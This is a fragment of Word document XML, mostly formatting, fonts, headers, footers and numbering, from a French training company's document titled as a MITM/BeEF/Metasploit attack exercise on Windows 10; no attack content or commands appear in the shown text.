                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="002F07BD" w:rsidRPr="002F07BD" w:rsidSect="001A468A">
      <w:headerReference w:type="default" r:id="rId68"/>
      <w:footerReference w:type="default" r:id="rId69"/>
      <w:type w:val="continuous"/>
      <w:pgSz w:w="11906" w:h="16838" w:code="9"/>
      <w:pgMar w:top="1418" w:right="1418" w:bottom="1418" w:left="1418"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3C2C2" w14:textId="77777777" w:rsidR="001A468A" w:rsidRDefault="001A468A">
      <w:pPr>
        <w:spacing w:before="0"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="6A0EB42F" w14:textId="77777777" w:rsidR="001A468A" w:rsidRDefault="001A468A">
      <w:pPr>
        <w:spacing w:before="0"/>
      </w:pPr>
      <w:r>
        <w:continuationSeparator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationNotice" w:id="1">
    <w:p w14:paraId="571A8C58" w14:textId="77777777" w:rsidR="001A468A" w:rsidRDefault="001A468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altName w:val="Calibri"/>
    <w:panose1 w:val="020F0502020204030204"/>
    <w:charset w:val="00"/>
    <w:family w:val="swiss"/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="E4002EFF" w:usb1="C000247B" w:usb2="00000009" w:usb3="00000000" w:csb0="000001FF" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="Arial Gras">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altName w:val="Consolas"/>
    <w:panose1 w:val="020B0609020204030204"/>
    <w:charset w:val="00"/>
    <w:family w:val="modern"/>
    <w:pitch w:val="fixed"/>
    <w:sig w:usb0="E00006FF" w:usb1="0000FCFF" w:usb2="00000001" w:usb3="00000000" w:csb0="0000019F" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="FrankRuehl">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6417E" w14:textId="7D924689" w:rsidR="00C25E6F" w:rsidRDefault="00AB3C20" w:rsidP="00F419BC">
    <w:pPr>
      <w:pStyle w:val="Pieddepage"/>
      <w:rPr>
        <w:spacing w:val="-6"/>
      </w:rPr>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:spacing w:val="-6"/>
      </w:rPr>
      <w:t xml:space="preserve">Easyformer - </w:t>
    </w:r>
    <w:r w:rsidRPr="00F419BC">
      <w:t>12</w:t>
    </w:r>
    <w:r w:rsidR="00C25E6F">
      <w:rPr>
        <w:spacing w:val="-6"/>
      </w:rPr>
      <w:t xml:space="preserve"> rue des violettes</w:t>
    </w:r>
    <w:r w:rsidR="00C25E6F" w:rsidRPr="00F419BC">
      <w:rPr>
        <w:spacing w:val="-6"/>
      </w:rPr>
      <w:t xml:space="preserve"> </w:t>
    </w:r>
    <w:r w:rsidRPr="00F419BC">
      <w:rPr>
        <w:spacing w:val="-6"/>
      </w:rPr>
      <w:t>-</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:spacing w:val="-6"/>
      </w:rPr>
      <w:t xml:space="preserve"> 95000</w:t>
    </w:r>
    <w:r w:rsidR="00C25E6F">
      <w:rPr>
        <w:spacing w:val="-6"/>
      </w:rPr>
      <w:t xml:space="preserve"> Cergy</w:t>
    </w:r>
  </w:p>
  <w:p w14:paraId="049B57B8" w14:textId="18633D80" w:rsidR="00C25E6F" w:rsidRPr="00A0138A" w:rsidRDefault="00C25E6F" w:rsidP="00AB3C20">
    <w:pPr>
      <w:pStyle w:val="Pieddepage"/>
      <w:jc w:val="left"/>
      <w:rPr>
        <w:spacing w:val="-6"/>
      </w:rPr>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:spacing w:val="-6"/>
      </w:rPr>
      <w:t xml:space="preserve"> </w:t>
    </w:r>
    <w:r w:rsidR="00AB3C20">
      <w:rPr>
        <w:spacing w:val="-6"/>
      </w:rPr>
      <w:tab/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:spacing w:val="-6"/>
      </w:rPr>
      <w:t xml:space="preserve">    </w:t>
    </w:r>
    <w:r w:rsidRPr="00A0138A">
      <w:rPr>
        <w:spacing w:val="-6"/>
      </w:rPr>
      <w:t xml:space="preserve">Email : </w:t>
    </w:r>
    <w:r w:rsidR="00CE1B05" w:rsidRPr="00A0138A">
      <w:rPr>
        <w:spacing w:val="-6"/>
      </w:rPr>
      <w:t>info@easyformer</w:t>
    </w:r>
    <w:r w:rsidRPr="00A0138A">
      <w:rPr>
        <w:spacing w:val="-6"/>
      </w:rPr>
      <w:t xml:space="preserve">.fr   </w:t>
    </w:r>
    <w:r w:rsidR="00AB3C20" w:rsidRPr="00A0138A">
      <w:rPr>
        <w:spacing w:val="-6"/>
      </w:rPr>
      <w:t xml:space="preserve"> Web</w:t>
    </w:r>
    <w:r w:rsidRPr="00A0138A">
      <w:rPr>
        <w:spacing w:val="-6"/>
      </w:rPr>
      <w:t xml:space="preserve"> :</w:t>
    </w:r>
    <w:r w:rsidR="00AB3C20" w:rsidRPr="00A0138A">
      <w:rPr>
        <w:spacing w:val="-6"/>
      </w:rPr>
      <w:t xml:space="preserve"> www.easyformer.fr</w:t>
    </w:r>
  </w:p>
  <w:p w14:paraId="3C8A97BF" w14:textId="0683CB2A" w:rsidR="00AB3C20" w:rsidRPr="00F419BC" w:rsidRDefault="00AB3C20" w:rsidP="00AB3C20">
    <w:pPr>
      <w:pStyle w:val="Pieddepage"/>
      <w:jc w:val="left"/>
      <w:rPr>
        <w:spacing w:val="-6"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidRPr="00A0138A">
      <w:rPr>
        <w:spacing w:val="-6"/>
      </w:rPr>
      <w:tab/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:spacing w:val="-6"/>
      </w:rPr>
      <w:t xml:space="preserve">Document réservé aux formateurs </w:t>
    </w:r>
    <w:proofErr w:type="spellStart"/>
    <w:r>
      <w:rPr>
        <w:spacing w:val="-6"/>
      </w:rPr>
      <w:t>EasyFormer</w:t>
    </w:r>
    <w:proofErr w:type="spellEnd"/>
  </w:p>
  <w:p w14:paraId="5680D242" w14:textId="77777777" w:rsidR="00C25E6F" w:rsidRPr="00F419BC" w:rsidRDefault="00C25E6F">
    <w:pPr>
      <w:pStyle w:val="Pieddepage"/>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Ind w:w="-72" w:type="dxa"/>
      <w:tblBorders>
        <w:insideH w:val="single" w:sz="4" w:space="0" w:color="0A9E97"/>
      </w:tblBorders>
      <w:tblLayout w:type="fixed"/>
      <w:tblCellMar>
        <w:left w:w="70" w:type="dxa"/>
        <w:right w:w="70" w:type="dxa"/>
      </w:tblCellMar>
      <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
    </w:tblPr>
    <w:tblGrid>
      <w:gridCol w:w="1418"/>
      <w:gridCol w:w="6237"/>
      <w:gridCol w:w="1701"/>
    </w:tblGrid>
    <w:tr w:rsidR="00C25E6F" w14:paraId="6FCC416E" w14:textId="77777777" w:rsidTr="007C6322">
      <w:trPr>
        <w:cantSplit/>
        <w:trHeight w:val="285"/>
      </w:trPr>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="1418" w:type="dxa"/>
          <w:vMerge w:val="restart"/>
        </w:tcPr>
        <w:p w14:paraId="35C73BA2" w14:textId="77777777" w:rsidR="00C25E6F" w:rsidRDefault="00C25E6F">
          <w:pPr>
            <w:spacing w:before="0" w:after="40"/>
            <w:ind w:left="-68" w:right="-68"/>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              <w:bCs/>
              <w:spacing w:val="60"/>
              <w:sz w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:object w:dxaOrig="960" w:dyaOrig="960" w14:anchorId="184EEE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45pt;height:43.3pt" o:ole="">
                <v:imagedata r:id="rId1" o:title=""/>
              </v:shape>
              <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_i1026" DrawAspect="Content" ObjectID="_1769339261" r:id="rId2"/>
            </w:object>
          </w:r>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="6237" w:type="dxa"/>
          <w:vAlign w:val="center"/>
        </w:tcPr>
        <w:p w14:paraId="37477E29" w14:textId="54D8E250" w:rsidR="00C25E6F" w:rsidRDefault="00491536">
          <w:pPr>
            <w:pStyle w:val="En-Tete"/>
            <w:spacing w:before="0" w:after="0"/>
          </w:pPr>
          <w:fldSimple w:instr=" STYLEREF Type-document \* MERGEFORMAT ">
            <w:r w:rsidR="00EF62A7" w:rsidRPr="00EF62A7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Vulnérabilité</w:t>
            </w:r>
            <w:r w:rsidR="00EF62A7">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve"> Post Client</w:t>
            </w:r>
          </w:fldSimple>
          <w:r w:rsidR="00C25E6F">
            <w:t xml:space="preserve">    </w:t>
          </w:r>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="1701" w:type="dxa"/>
          <w:vAlign w:val="center"/>
        </w:tcPr>
        <w:p w14:paraId="4CBFA93C" w14:textId="77777777" w:rsidR="00C25E6F" w:rsidRDefault="00C25E6F">
          <w:pPr>
            <w:pStyle w:val="En-Tete"/>
            <w:spacing w:before="0" w:after="0"/>
            <w:ind w:right="-57"/>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4</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:snapToGrid w:val="0"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:snapToGrid w:val="0"/>
            </w:rPr>
            <w:t xml:space="preserve"> sur </w:t>
          </w:r>
          <w:fldSimple w:instr=" NUMPAGES  \* MERGEFORMAT ">
            <w:r w:rsidRPr="00582198">
              <w:rPr>
                <w:noProof/>
                <w:snapToGrid w:val="0"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:fldSimple>
        </w:p>
      </w:tc>
    </w:tr>
    <w:tr w:rsidR="00C25E6F" w14:paraId="451A102B" w14:textId="77777777" w:rsidTr="007C6322">
      <w:trPr>
        <w:cantSplit/>
        <w:trHeight w:val="285"/>
      </w:trPr>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="1418" w:type="dxa"/>
          <w:vMerge/>
        </w:tcPr>
        <w:p w14:paraId="09F7029D" w14:textId="77777777" w:rsidR="00C25E6F" w:rsidRDefault="00C25E6F">
          <w:pPr>
            <w:ind w:left="68" w:right="-68"/>
          </w:pPr>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="6237" w:type="dxa"/>
          <w:vAlign w:val="center"/>
        </w:tcPr>
        <w:p w14:paraId="642BF901" w14:textId="75796DB8" w:rsidR="00C25E6F" w:rsidRDefault="00C25E6F" w:rsidP="00F419BC">
          <w:pPr>
            <w:pStyle w:val="En-Tete"/>
            <w:spacing w:before="0" w:after="0"/>
          </w:pPr>
          <w:r>
            <w:t xml:space="preserve">© </w:t>
          </w:r>
          <w:r w:rsidR="001413A4">
            <w:t>EASYFORMER</w:t>
          </w:r>
          <w:r>
            <w:t xml:space="preserve"> 201</w:t>
          </w:r>
          <w:r w:rsidR="001413A4">
            <w:t>6</w:t>
          </w:r>
          <w:r>
            <w:t xml:space="preserve"> - Tous droits réservés</w:t>
          </w:r>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="1701" w:type="dxa"/>
          <w:vAlign w:val="center"/>
        </w:tcPr>
        <w:p w14:paraId="05FC8F82" w14:textId="06BC0C0C" w:rsidR="00C25E6F" w:rsidRDefault="00C25E6F">
          <w:pPr>
            <w:pStyle w:val="En-Tete"/>
            <w:spacing w:before="0" w:after="0"/>
            <w:ind w:right="-57"/>
            <w:jc w:val="right"/>
          </w:pPr>
          <w:r>
            <w:t xml:space="preserve">Date : </w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rStyle w:val="Rfrence"/>
              <w:sz w:val="18"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rStyle w:val="Rfrence"/>
              <w:sz w:val="18"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> DATE \@ "dd/MM/yy" \* MERGEFORMAT </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rStyle w:val="Rfrence"/>
              <w:sz w:val="18"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00704073">
            <w:rPr>
              <w:rStyle w:val="Rfrence"/>
              <w:noProof/>
              <w:sz w:val="18"/>
            </w:rPr>
            <w:t>13/02/24</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rStyle w:val="Rfrence"/>
              <w:sz w:val="18"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:tc>
    </w:tr>
  </w:tbl>
  <w:p w14:paraId="13EB2654" w14:textId="77777777" w:rsidR="00C25E6F" w:rsidRDefault="00C25E6F">
    <w:pPr>
      <w:pStyle w:val="Pieddepage"/>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431E3" w14:textId="77777777" w:rsidR="001A468A" w:rsidRDefault="001A468A">
      <w:pPr>
        <w:spacing w:before="0"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="6C8127D8" w14:textId="77777777" w:rsidR="001A468A" w:rsidRDefault="001A468A">
      <w:pPr>
        <w:spacing w:before="0"/>
      </w:pPr>
      <w:r>
        <w:continuationSeparator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationNotice" w:id="1">
    <w:p w14:paraId="57F3FDD2" w14:textId="77777777" w:rsidR="001A468A" w:rsidRDefault="001A468A">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080" w:type="dxa"/>
      <w:tblInd w:w="637" w:type="dxa"/>
      <w:tblBorders>
        <w:top w:val="single" w:sz="8" w:space="0" w:color="auto"/>
        <w:left w:val="single" w:sz="8" w:space="0" w:color="auto"/>
        <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
        <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
      </w:tblBorders>
      <w:tblLayout w:type="fixed"/>
      <w:tblCellMar>
        <w:left w:w="70" w:type="dxa"/>
        <w:right w:w="70" w:type="dxa"/>
      </w:tblCellMar>
      <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
    </w:tblPr>
    <w:tblGrid>
      <w:gridCol w:w="8080"/>
    </w:tblGrid>
    <w:tr w:rsidR="00C25E6F" w14:paraId="70E1EAC2" w14:textId="77777777">
      <w:trPr>
        <w:cantSplit/>
        <w:trHeight w:val="1416"/>
      </w:trPr>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="8080" w:type="dxa"/>
          <w:tcBorders>
            <w:top w:val="nil"/>
            <w:left w:val="nil"/>
            <w:bottom w:val="nil"/>
            <w:right w:val="nil"/>
          </w:tcBorders>
          <w:vAlign w:val="center"/>
        </w:tcPr>
        <w:p w14:paraId="00BB2205" w14:textId="77777777" w:rsidR="00C25E6F" w:rsidRDefault="00C25E6F" w:rsidP="00821D49">
          <w:pPr>
            <w:pStyle w:val="En-tte"/>
            <w:spacing w:before="0"/>
            <w:jc w:val="center"/>
            <w:rPr>
              <w:color w:val="3A1D00"/>
              <w:spacing w:val="-6"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00733300">
            <w:rPr>
              <w:b/>
              <w:i/>
              <w:noProof/>
              <w:color w:val="3A1D00"/>
              <w:spacing w:val="-6"/>
            </w:rPr>
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6FB4624E" wp14:editId="762C3089">
                <wp:extent cx="1133475" cy="323850"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="14" name="Picture 14" descr="F:\___save-a\Professionel\_1901\Easyformer\2017-01-03 save Easyformer\Identité visuelle\easyFormer- texte only (mi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F:\___save-a\Professionel\_1901\Easyformer\2017-01-03 save Easyformer\Identité visuelle\easyFormer- texte only (midd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323850"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:noFill/>
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                      </pic:spPr>
                    </pic:pic>
                  </a:graphicData>
                </a:graphic>
              </wp:inline>
            </w:drawing>
          </w:r>
        </w:p>
        <w:p w14:paraId="2614CAE5" w14:textId="77777777" w:rsidR="00C25E6F" w:rsidRPr="00DB5F53" w:rsidRDefault="00C25E6F" w:rsidP="00821D49">
          <w:pPr>
            <w:pStyle w:val="En-tte"/>
            <w:spacing w:before="0"/>
            <w:jc w:val="center"/>
            <w:rPr>
              <w:rFonts w:cs="FrankRuehl"/>
              <w:b/>
              <w:i/>
              <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
              <w:lang w:bidi="he-IL"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00DB5F53">
            <w:rPr>
              <w:rFonts w:cs="FrankRuehl"/>
              <w:b/>
              <w:i/>
              <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
              <w:spacing w:val="-6"/>
              <w:lang w:bidi="he-IL"/>
            </w:rPr>
            <w:t>La formation à 360°</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="06B88C10" w14:textId="77777777" w:rsidR="00C25E6F" w:rsidRDefault="00C25E6F">
          <w:pPr>
            <w:spacing w:before="0"/>
            <w:ind w:left="-68" w:right="-70"/>
            <w:jc w:val="center"/>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              <w:color w:val="000000"/>
              <w:sz w:val="18"/>
            </w:rPr>
          </w:pPr>
        </w:p>
      </w:tc>
    </w:tr>
  </w:tbl>
  <w:p w14:paraId="25F80BBA" w14:textId="77777777" w:rsidR="00C25E6F" w:rsidRDefault="00C25E6F">
    <w:pPr>
      <w:pStyle w:val="MRS-Pictos-Conceptio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Ind w:w="70" w:type="dxa"/>
      <w:tblBorders>
        <w:top w:val="single" w:sz="8" w:space="0" w:color="auto"/>
        <w:left w:val="single" w:sz="8" w:space="0" w:color="auto"/>
        <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
        <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
      </w:tblBorders>
      <w:tblLayout w:type="fixed"/>
      <w:tblCellMar>
        <w:left w:w="70" w:type="dxa"/>
        <w:right w:w="70" w:type="dxa"/>
      </w:tblCellMar>
      <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
    </w:tblPr>
    <w:tblGrid>
      <w:gridCol w:w="5670"/>
      <w:gridCol w:w="2410"/>
      <w:gridCol w:w="1134"/>
    </w:tblGrid>
    <w:tr w:rsidR="00C25E6F" w14:paraId="37963DBA" w14:textId="77777777">
      <w:trPr>
        <w:cantSplit/>
        <w:trHeight w:val="350"/>
      </w:trPr>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="5670" w:type="dxa"/>
          <w:tcBorders>
            <w:top w:val="nil"/>
            <w:left w:val="nil"/>
            <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            <w:right w:val="nil"/>
          </w:tcBorders>
          <w:vAlign w:val="center"/>
        </w:tcPr>
        <w:p w14:paraId="0843DC3D" w14:textId="1A11E8FD" w:rsidR="00C25E6F" w:rsidRDefault="00491536">
          <w:pPr>
            <w:pStyle w:val="En-Tete"/>
            <w:spacing w:before="0" w:after="0"/>
            <w:ind w:left="-68" w:right="0"/>
            <w:jc w:val="left"/>
          </w:pPr>
          <w:fldSimple w:instr=" STYLEREF &quot;Titre du document&quot; \* MERGEFORMAT ">
            <w:r w:rsidR="00EF62A7" w:rsidRPr="00EF62A7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Attaque MITM/Beef/Metasploit sur Windows10</w:t>
            </w:r>
          </w:fldSimple>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="2410" w:type="dxa"/>
          <w:tcBorders>
            <w:top w:val="nil"/>
            <w:left w:val="nil"/>
            <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            <w:right w:val="nil"/>
          </w:tcBorders>
          <w:vAlign w:val="center"/>
        </w:tcPr>
        <w:p w14:paraId="2E64B972" w14:textId="49FB436D" w:rsidR="00C25E6F" w:rsidRDefault="00C25E6F">
          <w:pPr>
            <w:pStyle w:val="En-Tete"/>
            <w:spacing w:before="0" w:after="0"/>
            <w:ind w:left="-70" w:right="0"/>
            <w:jc w:val="left"/>
          </w:pPr>
          <w:r>
            <w:t xml:space="preserve">Référence : </w:t>
          </w:r>
          <w:fldSimple w:instr=" STYLEREF Titre-projet \* MERGEFORMAT ">
            <w:r w:rsidR="00EF62A7">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>EF-TEST-TEST</w:t>
            </w:r>
          </w:fldSimple>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="1134" w:type="dxa"/>
          <w:tcBorders>
            <w:top w:val="nil"/>
            <w:left w:val="nil"/>
            <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            <w:right w:val="nil"/>
          </w:tcBorders>
          <w:vAlign w:val="center"/>
        </w:tcPr>
        <w:p w14:paraId="692B2779" w14:textId="5F926FC9" w:rsidR="00C25E6F" w:rsidRDefault="00C25E6F">
          <w:pPr>
            <w:pStyle w:val="En-Tete"/>
            <w:spacing w:before="0" w:after="0"/>
            <w:ind w:left="-70" w:right="0"/>
            <w:jc w:val="right"/>
          </w:pPr>
          <w:r>
            <w:t xml:space="preserve">Version : </w:t>
          </w:r>
          <w:fldSimple w:instr=" STYLEREF N°Version \* MERGEFORMAT ">
            <w:r w:rsidR="00EF62A7" w:rsidRPr="00EF62A7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:fldSimple>
        </w:p>
      </w:tc>
    </w:tr>
  </w:tbl>
  <w:p w14:paraId="19CACA36" w14:textId="77777777" w:rsidR="00C25E6F" w:rsidRDefault="00C25E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82C2862"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="Listenumros"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="360"/>
        </w:tabs>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:cs="Times New Roman"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="FFFFFF89"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="6DB2AFE4"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:pStyle w:val="NumTableau"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="360"/>
        </w:tabs>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="08346688"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="097AFEB0"/>
    <w:lvl w:ilvl="0" w:tplc="FFFFFFFF">
      <w:start w:val="1"/>
      <w:numFmt w:val="upperLetter"/>
      <w:pStyle w:val="Sous-titreAlphabtique"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="388"/>
        </w:tabs>
        <w:ind w:left="369" w:hanging="341"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Times New Roman" w:hint="default"/>
        <w:b/>
        <w:i w:val="0"/>
        <w:sz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 w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="1DAD3B66"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="A8AE854C"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:pStyle w:val="Listepuces2"/>
      <w:lvlText w:val="–"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:left="708" w:hanging="283"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="4" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="290A26F5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="17D6F152"/>
    <w:lvl w:ilvl="0" w:tplc="5F4C3A1E">
      <w:start w:val="19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CD107BA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0FB4F2C2"/>
    <w:name w:val="EPMI - 1.1.1."/>
    <w:styleLink w:val="EPMI-111"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="340" w:hanging="340"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:cs="Times New Roman" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlRestart w:val="0"/>
      <w:lvlText w:val="%2.%1."/>
      <w:lvlJc w:val="left"/>
      <w:rPr>
        <w:rFonts w:cs="Times New Roman" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%2.%1.%3."/>
      <w:lvlJc w:val="left"/>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 w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="33E45EC5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BF1073D2"/>
    <w:lvl w:ilvl="0" w:tplc="661216F2">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4FE40D9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CB66B9FA"/>
    <w:styleLink w:val="EPMINchapitemodule"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:isLgl/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:cs="Times New Roman" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="340" w:hanging="34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 w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="49267B6C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0FB4F2C2"/>
    <w:name w:val="EPMI - 1.1.1.2"/>
    <w:numStyleLink w:val="EPMI-111"/>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="9" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="4EE72D09"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="862010AA"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="EF-chapitretitre"/>
      <w:lvlText w:val="%1"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:cs="Times New Roman" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="EFmoduletitre"/>
      <w:isLgl/>
      <w:lvlText w:val="%1.%2"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1080" w:hanging="720"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:cs="Times New Roman" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="EFtiquette"/>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880" w:hanging="2520"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:cs="Times New Roman" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="10" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="5F5D4025"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="3392BBD0"/>
